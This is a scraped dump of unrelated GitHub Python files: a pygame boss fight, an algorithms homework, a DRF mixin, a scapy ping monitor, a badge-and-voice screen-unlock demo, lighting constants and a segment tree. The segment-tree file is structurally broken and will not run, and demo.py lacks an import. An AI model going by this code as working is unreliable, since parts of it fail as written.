1200)\n\t\t\n\t\tif self.times_to_attack <= 0:\n\t\t\tself.times_to_attack = random.randint(10, 20)\n\t\t\tself.moving_to_cooldown = True\n\t\t\tself.state = COOLDOWN\n\n\t\tif not self.entered:\n\t\t\tif self.rect.y < SCALE_HEIGHT/2 - 100:\n\t\t\t\tself.rect.y += 2\n\t\t\telse:\n\t\t\t\tif self.entered_time == 0:\n\t\t\t\t\tself.entered_time = pygame.time.get_ticks()\n\t\t\t\t\tself.message = {\n\t\t\t\t\t\t\"create_time\": pygame.time.get_ticks(),\n\t\t\t\t\t\t\"text\": \"HUMANS MUST DIE!!!!!\",\n\t\t\t\t\t\t\"multiline\": False,\n\t\t\t\t\t\t\"wait_time\": 1500\n\t\t\t\t\t}\n\t\t\t\telse:\n\t\t\t\t\tif pygame.time.get_ticks() - self.entered_time > 500:\n\t\t\t\t\t\tself.entered = True\n\t\t\t\t\t\tself.state = BASE_ATTACK\n\t\t\t\t\t\tself.attacking = True\n\t\t\n\t\tif self.entered and not self.attacking and self.attack_hand is None and not self.moving_to_cooldown and not self.cooling_down and not self.moving_back:\n\t\t\tattack = random.choice(ATTACK_STAGES[str(self.stage)])\n\t\t\tif attack == BASE_ATTACK:\n\t\t\t\tself.state = BASE_ATTACK\n\t\t\t\tself.attacking = True\n\t\t\telif attack == SUPER_SMASH:\n\t\t\t\tself.state = SUPER_SMASH\n\t\t\t\tself.attacking = True\n\t\t\t\tself.smashed_times = 0\n\t\t\t\tself.smash_times = random.randint(8, 18)\n\t\t\t\tself.message = {\n\t\t\t\t\t\"create_time\": pygame.time.get_ticks(),\n\t\t\t\t\t\"text\": \"!!!!DIE!!!!\",\n\t\t\t\t\t\"multiline\": False,\n\t\t\t\t\t\"wait_time\": 900\n\t\t\t\t}\n\t\t\telif attack == HELL_FIRE:\n\t\t\t\tself.state = HELL_FIRE\n\t\t\t\tself.attacking = True\n\t\t\t\tself.current_frame = 0\n\t\t\t\tself.bombs = 0\n\t\t\t\tself.message = {\n\t\t\t\t\t\"create_time\": pygame.time.get_ticks(),\n\t\t\t\t\t\"text\": \"HELL FIRE\",\n\t\t\t\t\t\"multiline\": False,\n\t\t\t\t\t\"wait_time\": 1200\n\t\t\t\t}\n\t\t\n\t\tif pygame.mouse.get_pressed()[0]:\n\t\t\tself.health -= 6\n\n\t\tif self.health > self.max_health * 2/3:\n\t\t\tself.stage = 1\n\t\telif self.health > self.max_health * 1/3:\n\t\t\tself.stage = 2\n\t\telse:\n\t\t\tself.stage = 3\n\n\tdef circle_surf(self, radius, color):\n\t\tsurf = pygame.Surface((radius * 2, radius * 2))\n\t\tpygame.draw.circle(surf, color, (radius, radius), radius)\n\t\tsurf.set_colorkey((0, 0, 0))\n\t\treturn surf\n\t\n\tdef render(self, screen):\t\t\n\t\t# pygame.draw.rect(screen, (0, 255, 0), self.rect)\n\t\timage = self.image.copy()\n\t\tif not self.facing_right:\n\t\t\timage = pygame.transform.flip(self.image, True, False)\n\t\t\n\t\tif self.stage == 2:\n\t\t\tlist_of_colors = [\n\t\t\t\t[\"#df2929\", \"#28ccdf\"],\n\t\t\t\t[\"#f18a8a\", \"#8aebf1\"],\n\t\t\t\t[\"#a83939\", \"#3978a8\"],\n\t\t\t]\n\t\t\tfor colors in list_of_colors:\n\t\t\t\timage = palette_swap(image, colors[1], colors[0])\n\t\t\t\timage.set_colorkey((0, 0, 0))\n\t\telif self.stage == 3:\n\t\t\tlist_of_colors = [\n\t\t\t\t[\"#df2929\", \"#28ccdf\"],\n\t\t\t\t[\"#f18a8a\", \"#8aebf1\"],\n\t\t\t\t[\"#a83939\", \"#3978a8\"],\n\t\t\t\t[\"#783939\", \"#394778\"],\n\t\t\t\t[\"#6d3232\", \"#302c2e\"],\n\t\t\t]\n\t\t\tfor colors in list_of_colors:\n\t\t\t\timage = palette_swap(image, colors[1], colors[0])\n\t\t\t\timage.set_colorkey((0, 0, 0))\n\n\t\tscreen.blit(image, (self.rect.centerx - self.image.get_width()/2, self.rect.centery - self.image.get_height()/2))\n\n\t\tif self.message is not None:\n\t\t\tif pygame.time.get_ticks() - self.message[\"create_time\"] > self.message[\"wait_time\"]:\n\t\t\t\tself.message = None\n\t\t\telse:\n\t\t\t\ttext = MESSAGE_TEXT_FONT.render(self.message[\"text\"], False, (255, 255, 255))\n\t\t\t\tscreen.blit(text, (self.rect.centerx - text.get_width()/2, self.rect.centery - 60))\n\t\t\n\t\tfor particle in self.particles:\n\t\t\tpygame.draw.circle(screen, (255, 255, 255), [int(particle[0][0]), int(particle[0][1])], int(particle[2]))\n\n\t\t\tradius = particle[2] * 2\n\t\t\tscreen.blit(self.circle_surf(radius, (20, 150, 60)), (int(particle[0][0] - radius), int(particle[0][1] - radius)), special_flags=pygame.BLEND_RGB_ADD)\n\t\t\n\t\tif self.message is None and self.entered:\n\t\t\twidth = self.health / self.health_ratio\n\t\t\tpygame.draw.rect(screen, (255, 0, 0),(SCALE_WIDTH/2 - self.health_bar_length/2, 10, width, 15))\n\t\t\tpygame.draw.rect(screen, (0, 0, 0),(SCALE_WIDTH/2 - self.health_bar_length/2, 10, self.health_bar_length, 15), 2)\n\t\t\n\t\tif self.attack_hand is not None:\n\t\t\tself.attack_hand.update()\n\t\t\tself.attack_hand.render(screen)\n\t\t\n\n","repo_name":"KidCoderT/NatureFightBack","sub_path":"scripts/boss.py","file_name":"boss.py","file_ext":"py","file_size_in_byte":12600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6705229698","text":"'''\nGive a Θ(n log n) time divide and conquer algorithm that given an array A of n integers, finds two indices i < j \nsuch that A[j] - A[i] is maximized. Analyze and show that your algorithm runs in the required Θ(n log n) time.\n'''\ndef findMin(arr, low, high):\n min = arr[low]\n for i in range(low + 1, high + 1):\n if arr[i] < min:\n min = arr[i]\n return min\n\ndef findMax(arr, low, high):\n max = arr[low]\n for i in range(low + 1, high + 1):\n if arr[i] > max:\n max = arr[i]\n return max\n\ndef find_max_difference(arr, l, r):\n if l >= r:\n return l, r, 0\n max_diff = float('-inf')\n mid = l + (r - l) // 2\n i1, j1, left_max_diff = find_max_difference(arr, l, mid)\n i2, j2, right_max_diff = find_max_difference(arr, mid+1, r)\n min_left = findMin(arr, l, mid)\n max_right = findMax(arr, mid + 1, r)\n max_diff = max(max(left_max_diff, right_max_diff), max_right - min_left)\n if left_max_diff == max_diff:\n return i1, j1, max_diff\n elif right_max_diff == max_diff:\n return i2, j2, max_diff\n else:\n i = arr.index(min_left)\n j = arr.index(max_right)\n return i, j, max_diff\n\n# Example usage\narr = [4, 3, 10, 2, 9, 1, 6]\ni, j, max_diff = find_max_difference(arr, 0, len(arr) - 1)\nprint(f\"Indices i = {i}, j = {j}, Max Difference = {max_diff}\")\n# Indices i = 1, j = 2, Max Difference = 7\n","repo_name":"Yutong1996/CS5800-Algorithm-Homework","sub_path":"divide_and_conquer.py","file_name":"divide_and_conquer.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4599640273","text":"from rest_framework.fields import empty\n\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\nclass G3WRequestSerializer(object):\n \"\"\"\n DRF mixin serializer for to get django request object.\n \"\"\"\n def __init__(self, instance=None, data=empty, **kwargs):\n\n try:\n self.request = kwargs['request']\n del (kwargs['request'])\n except:\n LOGGER.warning('Serializer without request: it might be ok when called from a management command')\n self.request = None\n\n super(G3WRequestSerializer, self).__init__(instance, data, **kwargs)\n","repo_name":"g3w-suite/g3w-admin","sub_path":"g3w-admin/core/mixins/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"52"} +{"seq_id":"74031041126","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n Monitor (and log) a network connection\n\"\"\"\nimport enum\nimport sys\nimport os\nimport argparse\nimport logging\nimport time\nfrom datetime import timedelta\nfrom typing import List, Union\n\n__version__ = '1.1.1'\n__author__ = 'David Nugent '\n\n\nclass ConnectionState(enum.Enum):\n DOWN = 0\n UP = 1\n\n\ndef prog_name(prog: str) -> str:\n return os.path.basename(prog)\n\n\ndef parse_args(prog: str, args: List[str],\n namespace: Union[None, argparse.Namespace, None] = None) -> argparse.Namespace:\n prog = prog_name(prog)\n parser = argparse.ArgumentParser(prog=prog, description=__doc__)\n parser.add_argument('-H', '--host', action='store', default='8.8.8.8',\n help='host name or ip to test against')\n parser.add_argument('-i', '--interval', action='store', type=float, default=1.0,\n help='interval between tests (default 1.0 secs)')\n parser.add_argument('-e', '--errors', action='store', type=int, default=4,\n help='number of errors (lost packets) before connection is considered dead')\n parser.add_argument('-t', '--times', default=None,\n help='maximum number of times to try (default not set = forever)')\n parser.add_argument('-l', '--logfile', action='store', default=None,\n help='create or append log to a file (default none = no log file)')\n parser.add_argument('-c', '--csv', action='store', default=None,\n help='create or append RTT data to CSV file (default none = no RTT data logged)')\n parser.add_argument('-v', '--verbose', action='count', default=0,\n help='increase logging verbosity')\n parser.add_argument('-V', '--version', action='version', version=f'{prog} v{__version__} by {__author__}',\n help='print version and exit')\n namespace = namespace or argparse.Namespace(prog=prog, parser=parser, rdd=None)\n return parser.parse_args(args, namespace)\n\n\ndef setup_logging(logfile: str, verbosity: int) -> logging.Logger:\n logging.getLogger().handlers = [] # reset\n formatter = logging.Formatter('%(asctime)s %(name)s %(message)s')\n logger = logging.getLogger('cmon')\n # root logger level\n logger.setLevel(logging.WARNING if verbosity == 0 else logging.INFO if verbosity == 1 else logging.DEBUG)\n if logfile:\n # file logger\n fh = logging.FileHandler(logfile)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n\nclass CSVLog:\n HEADERS = 'timestamp,host,state,status,rtt\\n'\n\n def __init__(self, filename):\n self._filename = filename\n self._fd = None\n\n @property\n def filename(self):\n return self._filename\n\n def open(self):\n if self._filename:\n try:\n self._fd = open(self._filename, mode='a+', encoding='utf-8')\n # write headers if beginning of file\n if self._fd.seek(os.SEEK_CUR, 0) == 0:\n self._fd.write(self.HEADERS)\n except EnvironmentError:\n raise\n except (TypeError, AttributeError):\n pass\n return True\n return False\n\n def close(self):\n if self._fd is not None:\n self._fd.close()\n\n @staticmethod\n def esc(string):\n if not string:\n string = ''\n elif '\"' in string:\n string = '\"' + ''.join([f\"\\\\{x}\" if x == '\"' else x for x in string]) + '\"'\n return string\n\n def add(self, timestamp: float, host: str, state: str, status: str, rtt: float):\n if self._fd is not None:\n self._fd.write(f\"{timestamp},{self.esc(host)},{state},{self.esc(status)},{0.0 if not rtt else rtt}\\n\")\n self._fd.flush()\n\n\ndef monitor(logger: logging.Logger, csv: CSVLog, host: str, interval: float, errors: int, times: int):\n from scapy.layers.inet import ICMP, IP\n from scapy.sendrecv import sr1\n\n currentstate = None\n uptime = downtime = None\n pingcount = errcount = 0\n\n def in_milliseconds(value: float):\n return int(value * 1000000) / 1000\n\n def getstate(c: ConnectionState) -> str:\n return 'U' if c == ConnectionState.UP else 'D' if c == ConnectionState.DOWN else 'U'\n\n def diagnostic(sent, rcvd, e):\n new_state = ConnectionState.DOWN\n rtt = None\n if rcvd is None:\n result = 'timeout'\n elif e:\n result = f'error {e}: {e.args}'\n elif rcvd.src != sent.dst: # assume response from intermediary\n result = f'not reachable {rcvd.src} type={rcvd.type}'\n else:\n result = 'success'\n new_state = ConnectionState.UP\n rtt = in_milliseconds(rcvd.time - sent.sent_time)\n csv.add(sent.sent_time, host, getstate(new_state), result, rtt)\n logger.debug(f'{host} icmp {result}{\" \" + str(rtt) + \" ms\" if rtt else \"\"}')\n return new_state\n\n def lost(up_time):\n nonlocal downtime\n up_for = \"\"\n if up_time is not None and downtime is not None:\n duration = downtime - up_time\n up_for = f\" uptime {timedelta(seconds=duration)}\"\n logger.warning(f'{host} DOWN{up_for}')\n\n def recovered(current):\n nonlocal downtime, uptime, errcount\n uptime = current\n down_for = \"\"\n if downtime is not None:\n duration = current - downtime\n down_for = f\" dowmtime {timedelta(seconds=duration)}\"\n logger.warning(f'{host} UP{down_for}')\n errcount = 0\n downtime = None\n\n if os.geteuid() != 0:\n raise PermissionError('this script requires elevated (root) priviledges')\n\n while not times or pingcount < times:\n icmp = IP(dst=host)/ICMP()\n pingcount += 1\n endat = time.time() + interval\n exc = rsp = None\n starttime = time.time()\n try:\n rsp = sr1(icmp, timeout=interval, verbose=False)\n except OSError as ex:\n exc = ex\n newstate = diagnostic(icmp, rsp, exc)\n if currentstate is not ConnectionState.DOWN:\n if newstate is ConnectionState.DOWN: # UP failure case\n if downtime is None:\n downtime = starttime\n errcount += 1\n if errcount >= errors:\n lost(uptime)\n currentstate = newstate\n elif currentstate is not ConnectionState.UP: # found UP\n recovered(starttime)\n currentstate = newstate\n elif newstate is ConnectionState.UP:\n recovered(starttime)\n currentstate = newstate\n if starttime < endat:\n time.sleep(endat - starttime)\n return 0 if currentstate is ConnectionState.UP else 1\n\n\ndef run(argv: argparse.Namespace) -> int:\n logger = setup_logging(argv.logfile, argv.verbose)\n csv = CSVLog(argv.csv)\n message = f'Start host={argv.host} interval={argv.interval} maxerr={argv.errors}'\n if argv.times:\n message += f\" times={argv.times}\"\n if csv:\n message += f\" csv={csv.filename}\"\n message += f\"; v{__version__}\"\n logger.info(message)\n started = time.time()\n try:\n csv.open()\n monitor(logger, csv, argv.host, argv.interval, argv.errors, argv.times)\n except (KeyboardInterrupt, PermissionError, ImportError) as exc:\n logger.critical(f'Terminated: {exc.__class__.__name__}')\n csv.close()\n logger.info(f'Elapsed: {time.time() - started}')\n return 0\n\n\ndef main(prog: str, args: List[str]):\n return run(parse_args(prog, args))\n\n\nif __name__ == '__main__':\n exit(main(sys.argv[0], sys.argv[1:]))\n","repo_name":"deeprave/cmon","sub_path":"src/cmon.py","file_name":"cmon.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38579098967","text":"#!/usr/bin/python3 \n\nimport serial\nimport os\nimport subprocess\nimport sys\nimport time\nimport Quartz\nfrom ctypes import CDLL\nfrom piwho import recognition, vad\nimport pyaudio\nimport wave\n\n#below section is to import necessary packages from SpeechBrain. Pre-req follow the instructions to install SpeechBrain\n#required to run in root directory/speechbrain, otherwise speechbrain model will give error\n#python3 -m pip xxx\nfrom speechbrain.pretrained import SpeakerRecognition\n\n#below section is to import necessary packages from VOSK. Pre-req follow the instructions to install VOSK\nfrom vosk import Model, KaldiRecognizer, SetLogLevel\nimport json\nimport jellyfish \n\n#use speechbrain's speaker recognition model\nverification = SpeakerRecognition.from_hparams(source=\"speechbrain/spkrec-ecapa-voxceleb\", savedir=\"pretrained_models/spkrec-ecapa-voxceleb\")\n#asr_model = EncoderDecoderASR.from_hparams(source=\"speechbrain/asr-transformer-transformerlm-librispeech\", savedir=\"pretrained_models/asr-transformer-transformerlm-librispeech\")\n\n#use VOSK's ASR model - small, much better recognition latency\nasr_model = Model(lang=\"en-us\")\n\nchunk = 1024 # Record in chunks of 1024 samples\nsample_format = pyaudio.paInt16 # 16 bits per sample\nchannels = 1\nfs = 16000 # Record at 44100 samples per second\nseconds = 3\nfilename = \"to_be_verified.wav\"\n\nbadge_ids = {\n# '920A' : 'Alicia',\n '920A' : 'isaac',\n}\n\nsecretphrase = \"this is my secret phrase\"\n\ndef is_screen_locked():\n \"\"\" check if screen is currently locked \"\"\"\n settings = Quartz.CGSessionCopyCurrentDictionary()\n return (\"CGSSessionScreenIsLocked = 1\" in settings)\n\ndef identify_voice(speaker):\n \"\"\" check if speaker's voice matches the record \"\"\"\n # vad.record()\n p = pyaudio.PyAudio() # Create an interface to PortAudio\n\n print('Recording')\n\n stream = p.open(format=sample_format,\n channels=channels,\n rate=fs,\n frames_per_buffer=chunk,\n input=True)\n\n frames = [] # Initialize array to store frames\n\n # Store data in chunks for 3 seconds\n for i in range(0, int(fs / chunk * seconds)):\n data = stream.read(chunk)\n frames.append(data)\n\n # Stop and close the stream \n stream.stop_stream()\n stream.close()\n # Terminate the PortAudio interface\n p.terminate()\n\n print('Finished recording')\n\n # Save the recorded data as a WAV file\n wf = wave.open(filename, 'wb')\n wf.setnchannels(channels)\n wf.setsampwidth(p.get_sample_size(sample_format))\n wf.setframerate(fs)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n print('verifying ' + speaker)\n file1 = '/Users/Stevehe/Downloads/demo/speechbrain/to_be_verified.wav'\n file2 = '/Users/Stevehe/Downloads/demo/speechbrain/isaacoutput.wav'\n\n score, prediction = verification.verify_files(file1, file2)\n\n print('raw score: ' + str(score))\n print('verification result: ' + str(prediction.item()))\n\n if prediction.item() is False:\n os.system(\"say 'Voice does not match, you are not \" + name + \"!'\")\n\n sim_score = 0\n wf = wave.open(file1, \"rb\")\n\n # initialize a str to hold results\n results = \"\"\n textResults = \"\"\n \n if (prediction.item()):\n rec = KaldiRecognizer(asr_model, wf.getframerate())\n rec.SetWords(True)\n\n\n while True:\n data = wf.readframes(4000)\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n recognizerResult = rec.Result()\n results = results + recognizerResult\n # convert the recognizerResult string into a dictionary \n resultDict = json.loads(recognizerResult)\n # save the 'text' value from the dictionary into a list\n textResults = textResults + resultDict.get(\"text\", \"\")\n\n else:\n recognizerResult = rec.PartialResult()\n results = recognizerResult\n # convert the recognizerResult string into a dictionary \n resultDict = json.loads(recognizerResult)\n # save the 'text' value from the dictionary into textResults\n if (len(resultDict.get(\"partial\", \"\")) != 0):\n textResults = resultDict.get(\"partial\", \"\")\n print (\"rec.PartialResults: \" + textResults)\n \n # process \"final\" result\n results = results + rec.FinalResult()\n resultDict = json.loads(rec.FinalResult())\n textResults = textResults + resultDict.get(\"text\", \"\")\n\n sim_score = jellyfish.jaro_similarity(textResults, secretphrase)\n \n print (\"transcribed text is: \" + textResults)\n print (\"sim_score is: \" + str(sim_score))\n #transcribed = asr_model.transcribe_file(file1) for speechbrain's ASR model\n if sim_score < 0.8:\n os.system(\"say '\" + name + \" your secret phrase is incorrect!'\")\n \n \n return (prediction.item() and sim_score > 0.8)\n\ndef in_secure_area(locked, x, y, z):\n \"\"\" check if the given location is in the secure area \n\n Coordinate system\n\n x (0.4, 0)\n <---------------------------------------------- (0, 0)\n | |\n | COMPUTER |\n |____________________| (0, 0.25) |\n |\n |\n \\|/ y\n \"\"\"\n # calibrated model\n y = 1.24 * y + 0.15\n print(\"After calibration: x = \" + str(x) + \", y = \" + str(y))\n\n x_min = -0.5\n x_max = 1.0\n y_min = -0.5\n y_max = 1.0\n\n gray_space = 0.2\n if locked is True:\n return (x >= (x_min + gray_space) and x <= (x_max - gray_space) and y <= (y_max - gray_space) and y >= (y_min + gray_space))\n else:\n return (x >= x_min and x <= x_max and y <= y_max and y >= y_min)\n\n\n# object for voice recognition from old model\n#recog = recognition.SpeakerRecognizer('./')\n#print(recog.get_speakers())\n\n# object for locking screen\nloginPF = CDLL('/System/Library/PrivateFrameworks/login.framework/Versions/Current/login')\n\n# connect to DWM listener node\nDWM = serial.Serial(port=\"/dev/tty.usbmodem0007601808241\", baudrate=115200)\nprint(\"Connected to \" + DWM.name)\nDWM.write(\"\\r\\r\".encode())\nprint(\"Encoded\")\n#time.sleep(1)\n\n# lep is a DWM command to start reporting position of the active tags in the network\nDWM.write(\"lep\\r\".encode())\nprint(\"Encoded\")\n#time.sleep(1)\n\n# get the initial state of the screen\nlocked = is_screen_locked()\nprint(\"ScreenIsLocked = \" + str(locked))\n\nos.system('say \"Enter the system.\"')\ntry:\n while True:\n # read report from DWM board and parse the information\n #print (\"reading UWB data\")\n data = DWM.readline()\n #print (\"read data \" + str(data))\n if(data):\n #print(data)\n data = data.decode()\n # Expected output format from 'lep' command\n # POS,0,18B9,2.57,2.00,1.67,97 (meaning: position, tag_node_index, tag_device_id, x, y, z, quality_factor)\n if (\"POS\" in data):\n data = data.replace(\"\\r\\n\", \"\")\n data = data.split(\",\")\n id = data[2]\n quality_factor = int(data[6])\n if quality_factor > 80 and id in badge_ids:\n print(data)\n x = float(data[3])\n y = float(data[4])\n z = float(data[5])\n \n # map device ID to user name\n name = badge_ids[data[2]]\n print('check speaker ' + name)\n\n # check if the current location is within the predefined secure area bounding box\n dist_check = in_secure_area(locked, x, y, z)\n\n if locked is True and dist_check is True:\n print(\"Unlocking location: x = \" + str(x) + \" y = \" + str(y))\n os.system('say \"You have entered the secure area, please speak to unlock the computer\"')\n\n # check if voice matches\n voice_check = identify_voice(name)\n if voice_check is True:\n subprocess.call('./unlock_screen.csh', shell=True)\n locked = False\n os.system(\"say 'Hello, \" + name + \"!'\")\n else:\n os.system(\"say 'please try again!'\")\n elif locked is False and dist_check is False:\n print(\"Locking location: x = \" + str(x) + \" y = \" + str(y))\n os.system('say \"' + name + ' is out of the secure area, locking the computer.\"')\n # Lock screen\n result = loginPF.SACLockScreenImmediate()\n locked = True\n #print(\"quality_factor is too low: \" + str(quality_factor) + \" or id is wrong \" + id)\n #print (\"POS not in data\" + str(data))\n DWM.flushInput()\n #print (\"no valid data received\")\n DWM.flushInput()\n DWM.write(\"\\r\".encode())\n DWM.close()\n\nexcept KeyboardInterrupt:\n print(\"Stop\")\n DWM.write(\"\\r\\r\".encode())\n DWM.close()\nexcept Exception as e:\n print(traceback.format_exc())\n DWM.write(\"\\r\\r\".encode())\n DWM.close()\n\n","repo_name":"Opby/vectorauth","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39975507561","text":"\"\"\" Pixie constants \"\"\"\n\nDOMAIN = \"pixie\"\n\nCONF_DEVICE_ID = \"device_id\"\nCONF_CHANNEL = \"channel\"\nCONF_NAME = \"name\"\n \nPIXIE_ATTR_STATE = \"state\"\nPIXIE_ATTR_PICTURE = \"picture\"\nPIXIE_ATTR_TRANSITION_NAME = \"transition_name\"\nPIXIE_ATTR_TRANSITION = \"transition\"\nPIXIE_ATTR_EFFECT = \"effect\"\nPIXIE_ATTR_PARAMETER1 = \"parameter1\"\nPIXIE_ATTR_PARAMETER2 = \"parameter2\"\nPIXIE_ATTR_BRIGHTNESS = \"brightness\"\nPIXIE_ATTR_BOARD_TEMPERATURE = \"board_temperature\"\nPIXIE_ATTR_UPTIME = \"uptime\"\nPIXIE_ATTR_FIRMWARE_VERSION = \"firmware_version\"\nPIXIE_ATTR_MAC = \"mac\"\nPIXIE_ATTR_IP_ADDR = \"ip_addr\"\nPIXIE_ATTR_URL = \"url\"\n\n# Services\nSERVICE_SET_EFFECT = \"set_effect\"\nSERVICE_SET_RANDOM_EFFECT = \"set_random_effect\"\nSERVICE_SET_PICTURE = \"set_picture\"\nSERVICE_TURN_ON_TRANSITION = \"turn_on_transition\"\nSERVICE_TURN_OFF_TRANSITION = \"turn_off_transition\"\nSERVICE_CHECK_OTA = \"check_ota\"\n\n\nPIXIE_EFFECT_LIST = [\n \"ColorLoop\",\n \"Rainbow\",\n \"DoubleRainbow\",\n \"RainbowChase\",\n \"RunningLights\",\n \"TwoColors\",\n \"ThreeColors\",\n \"ColorPeaks\",\n \"Sparks\",\n \"Comet\",\n \"CometWithParticles\",\n \"RandomComets\",\n \"ColorFadings\",\n \"Sparkles\",\n \"SparklesOnColor\",\n \"SparklesOnColorLoop\",\n \"RainbowWipesUp\",\n \"RainbowWipesDown\",\n \"ColorWipes\",\n \"Chain\",\n \"BrokenLamp\",\n \"FastPixels\",\n \"BrightStripes\",\n \"DarkStripes\",\n \"MulticolorBurst\",\n \"OneColorBurst\",\n \"RandomColorBurst\",\n \"ColorPendulum\",\n \"RainbowScan\",\n \"DoubleRainbowScan\",\n \"RandomColor\",\n \"ChaseDown\",\n \"ChaseUp\",\n \"Chase2Down\",\n \"Chase2Up\",\n \"SporadicMeteors\",\n \"Dots\",\n \"RGBScanner\",\n \"Twinkles\",\n \"PixelQueue\",\n \"PeriodicMeteorsUp\",\n \"PeriodicMeteorsDown\",\n \"Flicker\",\n \"MultiplePixelQueues\",\n \"MultipleColorPixelQueues\",\n \"Fireworks\",\n \"Strobe\",\n \"BigSparks\",\n \"RunAndLightUp\",\n \"Moths\",\n \"Breathe\",\n \"Pixie\",\n \"Neutrinos\",\n \"Emitter\",\n \"BlackHole\",\n \"ColorRunsUp\",\n \"ColorRunsDown\",\n \"LightBars\",\n \"Fireworks2\",\n \"Paintbrush\",\n \"Lightning\",\n \"DarkSparklesOnColor\",\n \"Noise\",\n \"Particles\",\n \"Curtains\",\n \"Scanner\",\n \"OscillatingRainbow\",\n \"FlyingColorsUp\",\n \"FlyingColorsDown\",\n \"Waves\",\n]\n\nPIXIE_PICTURE_LIST = [\n \"Rainbow\",\n \"Rainbow2\",\n \"Rainbow3\",\n \"Rainbow4\",\n \"Dots\",\n \"Stripes\",\n \"ProgressBar\",\n \"Noise\",\n]\n\nPIXIE_TRANSITION_LIST = [\n \"Fade\",\n \"Unfold\",\n \"Fold\",\n \"Unroll\",\n \"Roll\",\n \"Dots\",\n \"FadeOut\",\n \"SinIn\",\n \"SinOut\",\n \"Paintbrush\",\n \"Curtains\",\n]\n\n","repo_name":"iothus14/Pixie-Home-Assistant-Integration","sub_path":"custom_components/pixie/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41746404591","text":"class Node(object):\r\n def __init__(self, start, end):\r\n self.start = start\r\n self.end = end\r\n self.total = 0\r\n self.left = None\r\n self.right = None\r\n\r\nclass NumArray(object):\r\n def __init__(self,arr):\r\n self.arr = arr\r\n #initialize data structure\r\n\r\n def createTree(self, arr, l, r):\r\n #base case\r\n if l > r:\r\n return None\r\n #leaf case\r\n if l == r:\r\n n = Node(l,r)\r\n n.total = arr[l]\r\n return n\r\n\r\n #recursive case\r\n mid = (l+r) //2\r\n root = Node(l,r)\r\n root.left = self.createTree(arr, l, mid)\r\n root.right = self.createTree(arr, mid+1, r)\r\n\r\n root.total = root.left.total + root.right.total\r\n return root\r\n\r\n root = createTree(self.arr, 0, len(self.arr)-1)\r\n\r\n\r\n def updateVal(root, i, val):\r\n\r\n #Base case. The actual value will be updated in a leaf.\r\n #The total is then propogated upwards\r\n if root.start == root.end:\r\n root.total = val\r\n return val\r\n\r\n mid = (root.start + root.end) // 2\r\n\r\n #If the index is less than the mid, that leaf must be in the left subtree\r\n if i <= mid:\r\n updateVal(root.left, i, val)\r\n\r\n #Otherwise, the right subtree\r\n else:\r\n updateVal(root.right, i, val)\r\n\r\n #Propogate the changes after recursive call returns\r\n root.total = root.left.total + root.right.total\r\n\r\n return root.total\r\n\r\n return updateVal(self.root, i, val)\r\n\r\n def sumRange(self, i, j):\r\n \"\"\"\r\n sum of elements nums[i..j], inclusive.\r\n :type i: int\r\n :type j: int\r\n :rtype: int\r\n \"\"\"\r\n #Helper function to calculate range sum\r\n def rangeSum(root, i, j):\r\n\r\n #If the range exactly matches the root, we already have the sum\r\n if root.start == i and root.end == j:\r\n return root.total\r\n\r\n mid = (root.start + root.end) // 2\r\n\r\n #If end of the range is less than the mid, the entire interval lies\r\n #in the left subtree\r\n if j <= mid:\r\n return rangeSum(root.left, i, j)\r\n\r\n #If start of the interval is greater than mid, the entire inteval lies\r\n #in the right subtree\r\n elif i >= mid + 1:\r\n return rangeSum(root.right, i, j)\r\n\r\n #Otherwise, the interval is split. So we calculate the sum recursively,\r\n #by splitting the interval\r\n else:\r\n return rangeSum(root.left, i, mid) + rangeSum(root.right, mid+1, j)\r\n\r\n return rangeSum(self.root, i, j)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n N, K = [int(x) for x in input().split()]\r\n arr= [0]*N #create the string\r\n numArray = NumArray(arr) #initialize data structure\r\n right = len(arr)-1\r\n numArray.createTree(arr, 0, right) # createtheTree\r\n\r\n for i in range(K):\r\n inst = input().split() #take in instruction\r\n if inst[0] == \"F\":\r\n if arr[inst[1]] == 0:\r\n numArray.updateVal(inst[1], 1)\r\n else:\r\n numArray.updateVal(inst[1], 0)\r\n if inst[0] == \"C\":\r\n num_1 = numArray.sumRange(inst[1],inst[2])\r\n print(num_1)\r\n","repo_name":"velvetarchangel/algorithm_problems","sub_path":"supercomputer.py","file_name":"supercomputer.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9963489506","text":"# coding: utf-8\n\nimport sys\ntry:\n import pypandoc\nexcept ImportError:\n WITH_PANDOC = False\nelse:\n WITH_PANDOC = True\n\nfrom swg2rst.swagger.base_swagger_object import BaseSwaggerObject\nfrom swg2rst.swagger.schema_objects import SchemaObjects\nfrom swg2rst.swagger.schema import SchemaMapWrapper\nfrom swg2rst.swagger.constants import SchemaTypes\nfrom swg2rst.swagger.operation import Operation\nfrom json import dumps\n\nHEADERS = {1: '=', 2: '~', 3: '-', 4: '+', 5: '^'}\n\n\nclass SwaggerObject(BaseSwaggerObject):\n\n @staticmethod\n def sorted(collection):\n \"\"\"\n sorting dict by key,\n schema-collection by schema-name\n operations by id\n \"\"\"\n if len(collection) < 1:\n return collection\n\n if isinstance(collection, dict):\n return sorted(collection.items(), key=lambda x: x[0])\n\n if isinstance(list(collection)[0], Operation):\n key = lambda x: x.operation_id\n 